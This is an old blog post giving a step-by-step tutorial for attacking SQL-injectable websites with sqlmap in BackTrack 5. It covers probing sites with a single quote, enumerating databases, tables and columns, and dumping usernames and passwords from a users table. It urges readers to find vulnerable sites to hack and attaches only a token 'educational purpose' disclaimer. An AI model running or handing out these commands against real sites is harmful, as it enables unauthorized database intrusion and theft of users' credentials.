Pages

Tuesday, November 6, 2012

SQLmap Tutorial



Hello  guyz :)
today I'm going to show you how to hack SQL Vuln. site with SQLmap in BackTrack 5
first of all find a Vuln. site, or test our own sites by adding a single quote in the end of our link

=> '


and I assume that you have basic knowledge about SQL injection before reading this tutorial :P
second of all open BackTrack > Terminal; then type
cd /pentest/database/sqlmap
hit Enter.
Now we are inside SQLmap, lets start hacking :P

####################################################################

Now the command we will need here is:
+++++++++++++++++++++++++++++++++++++++++
-D         <= define the database
-T          <= define the table
-C          <= define the column
--dbs     <= bring DataBases names
--tables  <= bring table names
--columns <=bring columns names
--dump    <= dump the data out of the column
++++++++++++++++++++++++++++++++++++++++++
###################################################################

Lets start :)
our first command will be:
./sqlmap.py -u www.website.com/index.php?id=13 --dbs    <= Example!

it will look like:


then we will get the Databases names like:


now we will ask for tables from any of those databases with --tables
now we have to select the database with "-D" and ask for the tables with "--tables" :)
so we will type:
./sqlmap.py -u www.website.com/index.php?id=13 -D database_name --tables

I choose walnut_live database so I typed:










and the results will be the tables name of course

it will look like:


now we got the tables and found the users table!!
now we will select this table by "-T" command and of course we already selected our database, so now we will write the same command, but we will replace "--tables" and put "-T" table_name which is "users" table and then ask for the columns inside that table by "--columns" command it will be like


./sqlmap.py -u www.website.com/index.php?id=13 -D database_name -T table_name --columns

it will look like:


 now we will get the results, the columns

they will come like this:


as you can see we got "id, pass, and user" columns
now we want the data from them so we will dump the data :P with"--dump"
but in this one we have two ways to get them..
we can dump all the data at once, Or select the column and get the data from
I will show you how both of them look like and used..

First we can get all the data by this command:

./sqlmap.py -u www.website.com/index.php?id=13 -D database_name -T table_name --dump

which will get us all the data at once and will look like this:


In the picture I marked the user and pass :)
now we will try getting them one by one with this command:


./sqlmap.py -u www.website.com/index.php?id=13 -D database_name -T table_name -C column_name --dump

for example I will get user and pass:

User::


Result::



Pass::


Result::



######################################################################

FOR EDUCATIONAL PURPOSE ONLY

######################################################################

Hope you all enjoy..................................... :D

Posted by at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)